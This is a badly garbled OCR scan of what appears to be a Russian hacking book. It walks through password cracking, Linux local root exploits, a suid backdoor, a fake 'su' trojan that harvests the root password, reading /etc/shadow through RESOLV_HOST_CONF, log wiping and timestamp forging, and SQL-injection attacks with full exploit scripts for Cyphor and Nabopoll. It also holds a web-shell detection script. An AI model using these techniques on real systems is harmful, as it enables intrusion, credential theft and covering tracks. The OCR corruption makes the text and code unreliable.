).
--users-[-]LOGIN|UID[,..]
.
--groups-[-JGID[,..]
( )
,
--shells-[-]SHELL[,..]
|6
()].
I Tnlx (
D E S ). 2 sail (),
, ,
, , S o laris
( SunOS).
( Linux I're ellS D )
D E S , (' 111
, , ;>
FreeBSD Linux M D 5 .
$1, JT K F r e e H S I) 1 )5
hash. Linux , 11
, lllowl'ish \2,
John The Ripper
.
,
(John i ),
U b u n tu Linux (B a c k Track 4 )
SHA-512, $, John , (
FreeHSI) I )5
, .
J T R (
3500 ),
. 1)5 ,
LDAP-
& 1
U n ix -
105
15 ,
8 *.
J1 R U n ix -,
D E S , ,
. , ,
-, Jo hn
,
. ,
, ,
^ , 4-,
.
*- J T R
M ySQL, M S SQ L
Oracle . .
40 .
?
(
15- 20 ) .
.
,
.
,
. , Linux-
3 - , ,
.
LDAP-
L D A P *1-.
root
/etx/passwd /etc/shadow,
L D A P .
. *-
base64.
ldap2pw
John The Ripper ( :: //www. openwal 1. com/1 i sts/john-users/2008/02/12 /1).
, :
I
r // Uh iI iftffPi/
W : // Ui K
o
use stn
use ::$64;
wtiilef > ! --ofv ;
other
chore:
106
MDS-
, , Windows
- MD5Inside,
InsidePro (. 0.1).
4
. ,
. ,
- . InsidePro
PasswordsPro, ,
.
M D C rack
(21 ), http://mdcrack.openwall.
net. .
( C U D ).
. MD5 (World Fastest M D 5 Cracker)
B arsW F (http: //3.14. by/ru/md5). GeForce GT220
05-
m pvvm m
04111|&*4909942?l:
C4cm zcsq9A6F78w 9b
20107*FB977I9AA27A0C995P?6?10
fc0tC&HACS907*&964R071S2D234ft70
9*0040318
27070644Al6091\
iu\i-'
7FCfftfc7QB7A70FAllAS93S572BACBB29
t$$PCtfeQ81F*3D73DB2 \;34l09
9QpFlODtmDP0C4F7054ABD2352932
ft0rtA4A7&B5i;,96 3019;l33AN672CA7
SBQQB39&9QB1D913F61IVU5796A136D
01701399$9772661
ie7fF443*lttOlCCIN0DC2&92F0BBA0
900I8Q963CO24Fe0D6963F7O2eB17F72
B2PC?14C47t7fiE9398F324C02B7F331P
*409240?199504786
9Q33B0B308F247C0C3CaODOC7S48C8B3
J;AE6SS04tU'r,F406SAD
/>
8O4U7BO790F11294A9C27DB6C3?B469
QTast HfYiplv v
Tm G
Qtlitjif
<^1254
|0TstJV
0Test_Ae
;ElTtit^AbC
:0Te*t,ARCD
|0Te*t^AftCOt
tei^ah
Qtes^bc
: abed
; I I T f t f t jibedf
0 T d S t .!
!0-TeisU#
0 Te * tJ$ #
:
I H *1 i
107
^j
..j......._ .....
1
12
123
1234
U*345
a
ab
abc
abed
abode
; 0 n/o
Ipxhml
153 155 ,
35-38 .
183 184 (. .2).
'
h t t p s/ / 3 .1 4 .by/en/md5
l i t t p : / / 3 .1 4 . by/ru/md5
154.28 MHash/eec
CPUO:
CPUls
21 .8 9 HHasb/sec
14.71 MHash/ec
CPU*:
154.26 MHAsh/seo
GPU**:
36 .6 0 HHAsh/soc
Key: -36U~w
fiv e .T o ta l*
183.79 MHash/sec
Hash! 1 b(Do9f H f f i 1 5 9 a ld 6 cb 8 6 f l l M c a
P ro 9 io8 8 : 3 2 .8 4 ETC
0 days 0 hours 26 min 24 sec
. 2. BarlWF
B arsW I* ,
* (,
h ttp://h ash . 1ns1depro.coro/Index,php? lancj^rus).
108
, :
barswf_cuda_x32 -h Ib0e9fd3086d9al59ald6cb86fllb4ca - ~
.
Rainbow Tables ( )
MD5-xanieii, .
. *
.
, root. ,
, , .
ssh - su.
nobody,
.
expect, . 1\
expect (
), bruteforce.exp,
su.
(
&) ,
. ,
su.
* nix-
(root). - privilege escalation, privilege
elevation (, , ).
, () -
. L in u x ,
(kernel) . ,
Linux (, Ubuntu, Fedora Red Mat)
.
D a m n Vulnerable Lin u x.
exploit-db.com.
MilwOrm, ,
. D am n Vulnerable Linux
/pentest/exploits/mi lwOrm Mi IwOrm,
2007 , .
( platforms), (
local remote), ,
( ports). exploit-db.
com , Mi IwOrm.
nobody ( su nobody), . 0 D .1 ,
/tmp ( cd /tmp).
. uname - . ,
Linux 2.6.20. ,
. Google Linux kernel 2.6 local root
exploit ( 2.6 root).
Linux kernel 2.6 Local Privilege Escalation.
exploit-db.com ,
,
, ,
, .
110
0 D .
bt
* su nobody
bt
r o c t $ cd /tup
jbt
% unaae *a
Linux bt 2.6.20*BT PwnSaucei'NG$NP #3 Sat Ftb 24 15;S2:^9 (iff 2007 t i l #
86 GNU/Linux
bt tap $ gcc s ta tic -W
-o ex ex*
bt
tap $ ./ex
1M 6
: OxO .. 0x1086
page: 0x6
page: 0x20
: 0x4000
0x5000
page: 0x4000
[*] page: 0x4020
[+1 : 0x1006 . . 0x2000
[+ ] page: 0x1000
M mnap: 0xb7f4a000 .. Oxb7f7cQOO
1+] root
bt tap # id
uid=0(root) gid=0(root) groups=98(nobody),4 4 (rtogroup)
bt tap v |
. O D .l. vmsplfee qaaz
Linux kernel
i i .m( h i
2008
( Compiler).
:
gcc -static -W -n - ex ex.
- (
/).
(ex. ) . (. . 0 D .I ) ,
, (warning)
(error) . (
/ /)
, : $
111
#, . id ,
root (uid-).
. !
,
Linux.
2.4.17 newlocal, kmod, uselib24;
2.4.18 brk, brk2, newlocal, kmod;
2.4.19 brk, brk2, newlocal, kmod;
2.4.20 ptrace, kmod, ptrace-kmod, brk, brk2;
2.4.21 brk, brk2, ptrace, ptrace-kmod;
2.4.22 brk, brk2, ptrace, ptrace-kmod;
2.4.22-10 loginx;
2.4.23 mremap_pte;
2.4.24 mremap_pte, uselib24;
2.4.25-1 uselib24;
2.4.27 uselib24;
2.6.2 mremap_pte, krad, hOOlyshit;
2.6.5-2.6.8 krad, krad2, hOOlyshit;
2.6.8-5 krad2, hOOlyshit;
2.6.9 krad, krad2, hOOlyshit;
2.6.9-34 rOOt, hOOlyshit;
2.6.10 krad, krad2, hOOlyshit;
2.6.13-2.6.16 raptor, raptor2, hOllyshit, prctl;
2.6.17-2.6.24.1 vmsplice;
2.6-2.6.19 (32bit) - ip_append_data() 0x82-CVE-2009-2698;
2.6.30 + /SE Lin ux/R H E L 5 Test Kernel Local Root Exploit Oday;
2.6.31 perf_counter (x64);
2.6.1-2.6.32-rc5 Pipe.c.
- -
( ),
root -,
.
SS H - .
, .
, ,
/bin/sh,
system ("chmod 4755 /tmp/hack");
11 2
0D.
.
hack, :
1nt main
Qetu1d(0);
getg1d<0):
file fopen (/* r);
cmd - fgets (file);
fclose(flle):
system(cmd);
}
/tmp/cmd ,
/tmp/hack suid.
. /tmp
tmp/evi 1.
, , /tmp/
cmd.
? I I o t o m v ,
root,
( do brk).
, , ,
/tmp/cmd
Iptables -t nat -nvL
, ,
Iptables
.
iptables
( )
- P H P - suid,
root.
,
(-day) ( ) ,
, .
. /bin/sh,
. 11 :
#!/b1n/sh
alias /b1n/sh" "chmod 4755 /tmp/evi1"
. /bin/sh root
chmod.
root
Back rack . (2.6.30),
113
: , , root..
I ! , . , -
?
I , root?
,
. , .bash history, ,
su (switch user),
. su
, .
:
mkdir .elm
, .ssh,
.
( ) .bashrc, :
-$0/.1:$
.elm. , su
( ), su ,
/bin, . su.c,
FA-Q 1999 , http: //www.
packetstormsecurity,org/trojans/index7.html.
:
/*
*
*
*
*
*
*/
#1nclude <stdio.h>
#include <stdlib.h>
//define SU_PASS "/tmp/.rewt"
rnalri (int argc, char *argv[])
char *key;
char buf[24]:
FILE *fd:
key (char *)getpass ("Password:"):
fd - fopen (SURPASS,"w");
(printf(fd, "pass: *s\n", key);
f1ose(fd):
printf ("su: incorrect password\n"):
sprintfCbuf, "rm *s", argv[0]):
system(buf):
exit (1):
t/
-.:
..
114
OD.
*0 -/.elm/su
su.c
, . ?
/tm p /. rewt,
, , .
,
, su.
, su.
, / tm p /. re w t. , ,
, - .
. :
Edrt
View
Bookmarks
Settings
Help
u r i@ b t:~ $ c c -o ~ / .e lm / s u s u .c
u r i@ b t:~ S I s - l a .e lm
t o t a l 20
d r w x r -x r -x 2 u r i t i r i 4 0 9 6 2 0 1 0 -0 7 -1 0 1 5 :4 3
d r w x r -x r -x 9 u r i u r i 4 0 9 6 2 0 1 6 -0 7 -1 0 1 5 :4 0 . ~
- r w x r - x r - x 1 u r i u r i 9 3 6 8 2 0 1 0 -0 7 -1 0 1 5 :4 3 su
------u r i@ b t : ~ S e c h o SPATH
/h o m e /u r i/, e l : /u s r /lo c a l/s b in : /t t s r /lo c a l/b if i:
J ^ to n :/u s r /b in :/s b in :/b in :/u s
/g a m e s
u r i@ b t:~ $ s u P a s sw o rd :
s u : in c o r r e c t p a s s w o rd
u r i$ b t:~ $ c a t /t a p /.r e w t
pass: to o r
u r i< a b t : ~ $ s u b a s h : / h o a e / u r i / . e l e / s u : N o suck f i l e o r d i r e c t o r y
u r i @ b t : ~ $ w t lic ll S ( L k
I
4 ye
j/b in /s u
u r i@ b t:~ $ / b m / s u
P a s s w o rd :
r o o t @ b t :/home
.t |
P u c 00,2. su
***
**~
,---._____________. - ..
___
115
|1 (home/uri).
su
root /tmp.
, su
bash su - /home/uri/.elm,
. , , ,
. su : /bin/su. ,
, su, ,
(, /bin/su), .
echo $
SPATH .
su ,
, .
, ,
.
, http://www.spywaredb.com/remove-su-trojan-ribbed/
( ):
Su trojan ribbed .
,
. Su trojan ribbed , Spyware Doc
tor. Su trojan ribbed , su.c.txt.
.txt . ,
su. .txt. (
, ),
su. ,
/tmp ,
. ,
,
.
, ,
. Spyware Doctor ,
.
.
/etc/shadow ,
root? .
, ,
. 1i be
5.4.7.
suid: ping, traceroute, rlogin ssh.
116
OD.
1. bash, bash.
2. :
export RESOLV_HOST_CONF/etc/shadow
3.
-
, asdf:
ping asdf
, /etc/
shadow. ,
!' root. D V L Linux. ,
. ping
(traceroute, rlogin, ssh) ,
RES0LV_H0ST_C0NF, , -, ,
, /etc/shadow. ,
(asdf),
, RES0LV H0ST C0NF.
rcb.c,
;
/* RCB Phraser - therapy in *96
* Limits: Linux only, no binary files.
* little personal message to the world: F*CK CENSORSHIP!
*/
#include <st.dio.h>
void getjunk(const char *filetocat.)
{ setenv (" RESOLV_H0ST_C0NF". fi 1etocat. 1):
systemCping xy 1> /dev/null 2> phrasing"):
unsetenv( "RESOLV HOST C0NF',;) :
>
void main(argc.argv)
int argc: char **argv;
{ char buffer[200];
char *gag:
' 7
,T,..
'
'
--ml
getjunk(argv[l]):
gag-buffer;
gag+-10:
devel fopen("phrasing","rb"):
while(!Teof(devel))
{ fgets(buffer.s1zeof(buffer),develJ:
117
if(strlen(buffer)>24)
{ strcpy(buffer+strlen(buffer)-24.\):
fputs(gag.stdout);
}
}
fclose(devel);
remove("phrasing");
}
rcb /etc/shadow
BMecTo/etc/shadow ,
.
Linux 2.6.7- (
, - )
Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit,
, /etc/passwd, ,
. 2004 ,
Marco Ivaldi,
http://www.exploit-db.com/exploi ts/718/
, root ?
, (
!), ,
, .
,
.
, :
last login from xxx.com time:0:00 date:xx/xx/xx.
IP- ,
. ,
ssh local host
. ,
:
last login from local host
,
.
- - (log wiper).
-. ( ) -.
. ,
. ,
. ,
,
(r o o t),
.
Apache,
.* ' /apache/1 ogs/accessJ og. (. 0 .1 ).
I*
9 1 - - fI5/Jun/2010:23:00i3$ +0000] *6
/*
127 f t 1 -
/f
127
J 1 S / J u n / 2 0 1 0 2 3 : 5 3 : 4 0 4-0000J "GET
fw } zrbTbvyz* /
12 ~ 1 i l
Wfl
2M 4m
J l S / J u n / 2 0 1 6 : 2 l : S 3 : 4 7 4*0 0 0 0 ] / * y , p h p ? p i g e , / , / . , / . / . / . . / e t c / p s w J
127
/*
I2 7
12?
200 26
164
173
123
119
WIMP, UIMP, la s t log, messages, sec ure, xfor log, iii.-i11 imj,
:
oi4 VrtBiOu*
vnriish?
0 1 (D am n V ulnerable L inux)
\ , exit .
ex1t() exit(O). .
1 (. 0 15.2):
J!H iSti
V t f lllM
<i p >
Futkmg elu tf i
. . 2.
outta here,
Vanish2
ul.fflp , wtmp . ,
Van bit 2 - , .
. .
Vttiii*sli2. *
. ,
,
exit(O),
, , :
#xit(0)
OS* I |>|) \ * it
I,'/
I)
(I
pCM M iaioH
11 I I 111 H i t I l l ' l l )
ta iilH TI
IP
tMvu
mi vViit Mr\yA#pfl
rniiw om i /vim / Ua l
/11*/\ i'Hiiml
iiu rii
WkiUW'
MU
ley i miI
t ktuiti I
h i* /// lug h w l
V, .A j 1.1 H.t |
I'm
ill
I |ii
10
IV | * 10 , im .
, >, , ! toucn t,
>i .1 < pny I | I I
tiHu M I 1111 MMJy(MMMM| 11- | i/iiiilibV // ri/iui ti)
121
,
, , ,
.
. ,
, ,
. ,
f i 1 . 27 2009 23 35 22 ,
:
touch -t 200906272335.22 f i l e .
,
.
, , , .
,
root,
.
, , , .
, ( w who)
( 1ast). ,
, last _.
( finger). /etc/passwd
/etc/shadow, . ,
, FTP, .
PuTTY, ,
Session Logging (Printable Output).
putty. 1 ( , ).
cat
.
.
/etc/shadow,
( /etc/shadow.old shadow,
).
LDAP, /usr/local/openldap/backup
LDAP . ,
, ,
base64. Perl,
, ,
John The Ripper.
.bash hi story.
123
(root). , (
.sh . .).
,
, .
root
hack, hacking, hacker, intruder . . ,
check_i ntruder. sh ,
. , ,
, ,
.
/etc/h o sts ssh/known_hosts,
, .
root .
root , root
,
ssh:
ssh root@other-host.net
,
.
3 (. 10.1).
. SQL-
, . XSS
.
, (
),
, .
,
().
: FTP,
,
(systemO, passthruO shell exec ), a peri- python-
. ,
-, .
-
,
.
, *
(,
).
, root ,
.
, , ,
,
.
, .
) 1$
1.
HtlhHVM
*|1
1 tat U MMbf'HiHH
-
V *'*
*
-
911
*|<
1| | ) 1 I W f t ! 1
11 luib&vvohl
1*
|0# II*
1 01 idMHi
root
I till\ m t i ) ,
$$
tfillUit
^41 ti
fciclO UtcMMM
,
root
i'rtpbtfjM
1-,
(remote) ,
.
.
(). ,
.
,
( -),
ftp- ProFTPD.
1.3.1 1.3.2 2,
SQL-. ( )
ftp- ( 21),
:
USER myuser
myuser .
:
PASS password
password myuser.
, FTP (
, , ).
% SQL-,
users () ,
1:
USER %') and 1-2 union select l.l.uid.gid.homedir.shell from users: -PASS: 1
.
http://downloads.securityfocus.com/vul nerabi1i ti es/exploi ts/33722.pi
:
./exploit.pl ftp.example.com
127
ftp.example.com ( ftp
FTP). ,
:
[*] Connected ftp.example.com
[!] Please Choose A Command Execute On ftp.exarnp1e.ccr :
[1] Show Files
[2] Delete File
[3] Rename File or Dir
[4] Create A Directory
[5] Exit
Enter Number Of Command Here ->
, 2005
: Linux-ftpd-ssl 0.17 (M K D /C W D ) Remote Root Exploit. .nut
ftp-
Linux.
,
. Sun
OpenSolaris (LiveCD). - ,
OpenSolaris,
DHCP- (
), jack
jack su
opensolaris. 2008 , Sun
.
,
.
. , , ,
.
. (
, 2005). 100
(), , .
,
check.sh ( ),
-. , -
-, r57shell, 99sh, void.ru,
PHP-, shell ,
base64_decode create function.
/var/1 og/check.log, -
.
, .
, shell ,
, - eval,
system passthru. ,
(cgitelnet, nfm . .).
#!/bin/bash
if [ $# -It 1 ]; then
echo usage: $0 file_name";
exit 0:
fi
RESULT-'
FILE""
for F in $( grep \.php$" $1 ); do
FIND='echo $F | grep -c "\.php$"'
if [ "$FIND" == "0" ]; then
if [ "$FILE"
j; then
FILE*=$F
else
FILE=$FILE" "$F
fi
I ip o I . i
el St'
if [ "SFILE" ] : then
FILE-SF
else
FILE-SFILE" "SF
f1
Fl"/usr/"SFILE
1f [ - f "$F1" ] ; then
RE-'grep -c r57shell "SF1" '
i f t "SRE" ! - "0" 3: then
RESULT-SRESULT"\nFIND possible hack f ile SF1
f1
^
*? ! 'l l
RE-'grep -c gzinflate "$F1 '
1f [ "SRE" ! - "0" 3: then
RESULT-$RESULT"\nFIND possible hack f ile "$F1
"
j
fl
; .
, v 'i?>
&
130
12.
f1
else
f1
done;
FILE-""
:
for F In $( grep "1ndex\.html$\|1ndex\.php$\|1ndex\.htm$" $1 ); do
FIND-'echo $F | grep -c "1ndex\."'
,,
/hfdv f
if | "$FIND" "0" I then
if [ "$FILE" - - "" ]: then
FILE-SF
.. '.
else
FILE-$FILE" "$F
. .,
,
fi
^
e
if [ "$FILE" ~ " ]; then
(I - '
FILE-$F
else
FILE**$FILE "$F
s ir
" * J
I
fFILE-""
1
^ :
done;
if [ "$RESULT" !- "" ]; then
echo -e 'date'$RESULT /var/log/check.log
echo -e 'date'$RESULT | mall -c sysadm0rnys1te.net -s "Rod Alert
possible hack file on myslte.net" adm1n9n\ys1te.net
else
echo -e 'd a te ' didn't find Intruder," /var/log/check,log
IT -
| ,
. ,
,
. , , ,
,
. , .
,
.
.
, , ,
(!).
1990-
,
()
. ( , )
,
( A B F),
(subsidiary) .
,
*,
.
,
( ).
ABF * (
, ,
132
13. -
) -
,
.
. ,
.
(
), .
, .
.
3- LINC . ,
, 1970-.
LINC II,
, ,
.
, LINC II,
...
LINC II , ,
, .
, ,
.
,
:
. ,
,
.
.
, ,
- .
, , .
.
: , (
) , , ABF,
UNISYS.
. (, , )
, , ,
.
, , ,
, ,
. , ,
. U N ISY S-U N ISY S,
ICQ
133
. , U N ISY SUNIMAS ( , , )
, ! .
,
.
, (
)
, ,
,
. ? , ,
,
.
?
,
, , ,
IT- ,
.
.
.
ICQ
2007 , . ,
, ( ),
. , , ,
. ,
.
: , ?
,
, .
. ,
, ,
. ,
, , jimm.
, -
. , jimm Java .
(
134
13.
jimm, .
( : : -, /
; -,
<| 1?! ; -,
( , ) ,
, , .
,
, , , .
.
,
jimm
, , . , ,
,
- .
, ,
. ? :
ICQ -.
, .
, ,
.
,
, ,
. .
, .,
. -
ICQ, :
.
, , .
.
( !;
I C Q { , ). ,
,
. .
,
274 , ,
.
135
,
. , ,
, ,
, ,
, ! - ,
ICQ- .
, , , .
, .
.
, , ? ,
, . .
,
,
,
.
, 2005 .
, ,
,
Linux.
,
.
, , ,
/tmp, , , ,
. , /tmp
.
Windows, .
, ,
- 1-.
, , ,
- - Perl.
: ,
, .
- .
, ,
. , , -,
.
, -.
136
13. -6
- ,
, .
,
, ,
.
, Google, .
,
,
-,
. Google
, .
, /tmp ,
. , - ,
-,
. .
, Linux Unix- ,
, , ,
.
, ?
,
, -,
, .
- , ,
90-, .
, ,
-,
,
. ,
, -
Google . -
.
, ,
.
root ,
( , suid).
Linux
2.6_, 2.4.x (
). , , , Google
( linux kernel 2.4. local root exploit)
root,
.
137
, ,
, , ,
- .
. ,
,
, ,
.
.
, ,
,
,
- , .
, ,
, - .
,
,
. ,
.
*nix-
Is <dir>
.
dir
. .
pwd
,
cd <dir>
,
cat <f1le>
.
1d
,
whoaml
? ,
-
,
uptime
( ).
netstat
.
man <command>
*nix-.
<command> -help
.
users
.
who
, .
W
, .
*-
ps
ps -
,
kill <PID>
<PID>.
finger <login>
.
last
,
last <login>
.
<file> <newlocation>
.
mv <file> <newlocation>
.
rm <file>
.
mkdir <dir>
.
rmdir <dir>
.
chmod <file>
.
vi <file>
vi.
vim <file>
.
<file> - <outfile>
.
gcc <file> - <outfile>
GNU.
wget -0 <outfile> <url>
.
curl - <outfile> <url>
139
SQL-
show.php Cyphor
. 2.1. cyphor/admin/forum-create.php
http://1ocal host/webexpl oi tati on_package_02/cyphor/admi n/forum-create. php
, . 2.2,
Create Forum.
SQL- id.
(. 2.3):
http://1oca1host/webexplo1tation_package_02/cyphor/show.php?fid*l&id-l0
union select 1.2.3,4,5.nick,password.8,id .10 from cyphor_users where idhl
cyphor_users id, nick, password
, id-1 ().
141
Location
View
Edit
fio
j^aokfnark&
Je o li
yyindow
N 4
[Test Forum
My t e s t
[ftj
H
iIA <
| j
forum
^%*||*1
Page loaded.
. 2.2. Cyphor
! >;0.
Location
Edit
View
.
Qo
Bookmarks
. .
loots
Settings
jyjndow
tJelp
mj
Text
User Info
^ J jj J
ad4KRH.YJ7j9A
alexl
(0 posts total, test
post: N/A)
1
Forums Overview l tatia1
1 .
1U
H .v w
Page loaded.
142
:
? MvSQL information_schema tables columns.
:
union select 1.2.3.4,5.6.group_concat(table_name),8.9,10
from i nformati on_schema.tables.
SQL- fid
show.php. , (
,
).
, , fid
(, fid--l), id
. ,
- :
fid=-l union select 1.2.3.4 from cyphor_users
(. 2.4).
^ 5 1 1._^02//5. - Konqueror
Location
dit
View
Go
Bookmarks
I s
Settings
jjVindow
Help
Page loaded.
,
: cyphor_4. (
show.php) ,
, .
, msg test.
143
'msg_test' ( ,
, ).
.
- ,
concat:
http://1 1host/webexploi tati on_package_02/cyphor/show.php?fi ch-1 uni on
select 1, concat(nick,0x3a,password),3 ,'msg_test' from cyphor_users
. 2.5.
admin;ad4ERM,YJ|7j9A - Konqueror
l ocation
d(t
yiew
Location:
ftookmarics
f "i
- 1 ! 4
'*. ;
M l
Iools
\ /
Settings
BJindow
:%
on% 2 0 sdect% 201 iconcat(niclc,0 x3 a4pa55word),3 /msg- test,% 20 from% 2 0 cyphor- u 5ers
1 userfs) online
ls**ed
Date
(emtpy forum)
Post *ew t m c j Ottapse
jfim w O m
Page loaded.
m s 1l ia I j
.... . ...
. ..
,|
to-
j^
(Release:
, ,
, .
.
Cyphor
Cyphor crypt
(), .
,
8 , ,
1000 (
). - ,
? , .
, (re g is te r.p h p ),
randomjjassword ( global s . php).
8- ,
, ,
.
, tim e(). ,
U n ix- ,
1 1970 . ,
cyphor users
( signupjdate). S Q L -
, . 3.1.
Zemngi
bif ; .';
T T iD
&m4Gw
m
f*tt w w im t l M
- U . ! 41
. . . . . . . . T - II
I-I
i. - -
I- 1 ......................................................... ....... - J
rr
-Hii.frn.'-if-'r
. '-.-I.I.
i i l M
Author
Subject
fatel
(errrtpy forum)
Pttiftttr.
j 0 .'.1 .
gj$f| Jum p to...
;*j;j G O j
'
If trim . ty m w * I Iinm i
t Mat
V <
mmnM
. 3 .1 .
, ( )
Cyphor
145
,
, ,
( signup date). regi s te r . php ,
signup_date + 1 (
). ,
signup date, random password.
( ,
). ,
( crack-pass. php), . 3.2.
#
admin:a(f4EflH.YJ7j9A;118326S359
$ti*eO - 1276826876;
fuser nick m *alice";
IhastT- "al,JF7HbXCbK.* j
for
$i|i+l)
i
Ipassword randoa^passwordi $tiroeO);
$p m crypt($p55word, 5trto*lower($user^nicK));
if {$p
$ha$h)
printf{"Password for user fuserjuck - $pas$word\n*)i
xit()i
>
$tie8 |tie + 1;
?>
'
. 3.2. crack-pass.php
crack-pass.php
, .
. ..
( ).
cyphor ( README.
txt, ).
.
146
3.
* W
Locabon
#$
)[)*&
Q/'i
bookmark*
JooU
\
Lc
Settings
Window
ijelp
V \ ;
- 4.
^ageloaded
. .-
crack-pass.php
: .
, .
11 SQ L-.
, . ,
( ,
, ) ,
, . 3.4 ( brute-pass.php).
<?
f users:
OP.
a l i c c t ft I . IFlHbXChK. 11276826876
. 3 .4 . brute-pass.php
Cyphor
147
45 .
,
.
. 3.5. al ice 118 .
Konsole <>
"i"'
. 3.5. brute-pass.php
( )
. ,
, ,
, (
).
,
, , .
5 ,
2 .
The matrix, :
-
. ,
instantCMS.
, ,
8.
, ,
-.
148
3. Cyphor
,
Telnet ( 80) , :
telnet 127.0.0.1 80
. .. -
.
,
.
crack-pass.php.
, PI 1
, ,
( ,
-,
admin, - ;
, ;
, John The Ripper).
, ,
.
. ( )
, SQL-, UPDATE,
3 ().
.
, !
.
Cyphor
149
,
?
, . 11,
md5-x3Hi , uname -,
id, pwd, who, ps . . ( Cyphor *nix-),
,
.
. - .
SQL Cyphor
, ,
http://www.securiteam.com/unixfocus/6P00FlFEKC.html.
- , ,
cyphor019.pl. , ,
$urt, users cyphor users.
. , Surl
, .
#!/bin/env peri
# //.....................................................................................................#
#// Cyphor Forum SQL Injection Exploit .. By HACKERS PAL
#// Greets For Devil-00 - Abducter - Almaster
#11 http://WwW.S0Q0R.NeT
# //..................- ............................................................................. #
use LWP::Simple:
print -\n
print "\n# Cyphor Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #":
if(!$ARGV[0]||!$ARGV[1]) {
print \n# -- Usage: #";
print "\n# -- peri $0 [Full-Path] 1 #;
print "\n# -- Example: #:
print "\n# -- peri $0 http://www.cynox.ch/cyphor/forum/ 1#";
print "\n# Greets To Devil-00 - Abducter - almastar #";
print "
exit(O):
}
else
pri nt -\n *
$web=$ARGV[0]:
$id-$ARGV[l];
$url = "show.php?fid-2&id
SQL- Cyphor
$s.ite="$web/$url";
$page = get($s1te) || die "[-] Unable to retrieve: $!";
p rint "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
Spage =~ m/<span class=bigh>(.*?)<\/span>/
&& print \n[+] User Name is: $l\n";
print "\n[-] Unable to retrieve User Name\n" if (!$ l):
$page m/<span class=message>(,*?)<\/span>/
&& print "[+] Hash of password is: $l\n";
print "[-] Unable to retrieve hash of password\n" if (! $ l) :
}
print "\n\nGreets From HACKERS PAL To you :)
NnWwW.SoQoR.NeT . . . You Are Welcome\n\n";
#finished
151
.^
.
h tm l-, <span class=bigh>
</span> ( ) , <span
class=message> </span> .
peri cyphor019.pl http://localhost/webexploitation_package_02/cyphor/ 1
, ,
( 1).
. 4.1.
! *
. 4 .1 . SQL- Cyphor
SQ L-
.
ns
SQL-
MS SQL Jet
,
.
1. Google:
s it e :.o r g i n u r l : .asp?id=*
site:.com i n u r l : .aspx?*
s i t e : . co.uk i n u r l : .asp?cid~
- .
2. , h t t p : //www. si t e .com
:
h ttp : / /www.site.com/en/press read. asp? i d=563
. URL
, :
h ttp : / /www.site.com/en/press read. asp? i d=563'
:
Microsoft OLE DB Provider fo r ODBC Drivers e rro r '80040el4'
[Microsoft][ODBC Microsoft Access D riv e r] Syntax e rro r in
s trin g in query expression 'id=563'
/en/includes/configdb.asp. lin e 23
,
, AND+1=1:
http://www.si te .com/en/pressread.asp?i d=563+AND+l=l#
------------------------------------------------------------------------------------------------------- -------------------- ASP # ,
- - /*.
153
:
A000B.Field error *800a0bcd*
Either BOF or EOF is True, or the current record has been deleted*
Requested operation requires a current, record.
/en/pressread.asp. line 44
To ,
ORDER BY . , , 10.
, :
Microsoft OLE DB Provider for ODBC Drivers error 80004005'
[Microsoft][ODBC Microsoft Access Driver] 1he Microsoft Jet database
engine does not recognize 10* as a valid field name or expression,
/en/includes/configdb.asp. line 23
, 10 .
, .
7:
http: //www. si te.com/en/pressread. asp?id*563+AND+1-04IN10N* At t.+Sl.l EC1
1 .2 .3 .4 .5 .6 .7 #
:
Microsoft OLE DB Provider for ODBC Drivers error 80004005'
[Microsoft][ODBC Microsoft Access Driver] Query input must, contain
at least one table or query.
/en/includes/configdb.asp. line 23
,
. :
http: / /www.site.com//press read.asp? id-563+AND+1-0+UNION+Al I+SGLt CT
1 .2 .3 .4 .5 .6 .7 FROM user#
,
:
Microsoft OLE DB Provider for ODBC Drivers error 80040e37
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database
engine cannot find the input table or query 'user'. Make sure It,
exists and that Its name 1s spelled correctly.
/en/includes/configdb.asp, line 23
, , ,
: user, users, admin, login, news, sysobjects, customers. ,
admin. ,
,
, , :
http://www.site./en/pressread.asp?1d-563+AND+l0+UNION+Al l +SI11GT*
l.2.3.4.5,6.7+from+adm1n#
154
3. , GROUP
BY ... HAVING, :
nabopoll.php
06,
, .
, .
, . :
<?
# Nabopoll Blind SQL Injection Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by sOcratex
# Contact: sOcratex@hotmail.com
# July 1. 2010 - modified by Uri
error_reporting(0);
ini_set("max_execution_time".0);
$srv - "localhost"; $path = ,7webexploitation_package_02/nabopoll";
$port = 80:
:
Ssurvey = "1"; //you can verify the number entering in the site
and viewing the re su lts ...
echo
\n ";
. .., 4
echo "Nabopoll SQL Injection -- Modified Exploit\n";
echo "......................................................................................-\n\n";
echo " -- /etc/passwd: \n:
$j - 1; $user - "";$x-0;
while(!strstr($user.chr(0))){
Sminx 0: Smaxx = 255;
$found = false; Sop - ">";
whi 1e( !$found) {
$x - intval(($maxx + Sminx)/2);
if (Smaxx == $minx+l) {
if (Sop == ">") { Sx-Smaxx; $found=true;$user.=chr($x);echo chr(Sx):break:}
if ((Sop
and (Sbingo)) { Sx=Smaxx; Sfoundtrue;$user.=chr(Sx);
echo chr(Sx);break;}
Sbingo = false;
Sxpl - 7result.php?surv-".Ssurvey."/**/AND/**/l-(
SELECT/**/( IF((ASCII(SUBSTRING(1oad_fi1e(
0x2f6574632f706173737764)S j.", 1 ))".Sop.Sx.").1.0)))/*";
Scnx - fsockopen(Ssrv,Sport);
ft
mu
15
__
. nabopoll.php
Sbingo-true;break; } }
fclose(Scnx):
i f (Sx255) {die(H\n Try again../);}
Sprevop-Sop;
1f (Sbingo) {
switch(Sop)
{
case
Sminx Sx;
break;
case
Smaxx - Sx;
break;
}
else
switch(Sop)
{
I : I
case
break;
case
w uvm
m &
'*
break:
}
Sj++;
}
echo "\n";
?>
, , -
( , , Sxpl-),
.
SQL- MS Access
:
[...] AND (SELECT TOP 1 1 FROM _)
:
[...] AND (SELECT TOP 1 1 FROM users)
:
AND (SELECT TOP 1 _ FROM _)
:
[...] AND (SELECT TOP 1 name FROM users)
:
[...] AND IIF((SELECT TOP 1 LEN(_) FROM _ = X. 1. 0)
:
[...] AND IIF((SELECT TOP 1 LEN(name) FROM users) - 8, 1. 0)
:
[...] AND IIF((SELECT TOP 1 _. X. 1)
FROM _) = ('), 1, 0)
:
[...] AND IIF((SELECT TOP 1 MID(name. 1. 1)
FROM users ) = CHR(65). 1. 0)
instantCMS
T he m atrix,
,
.
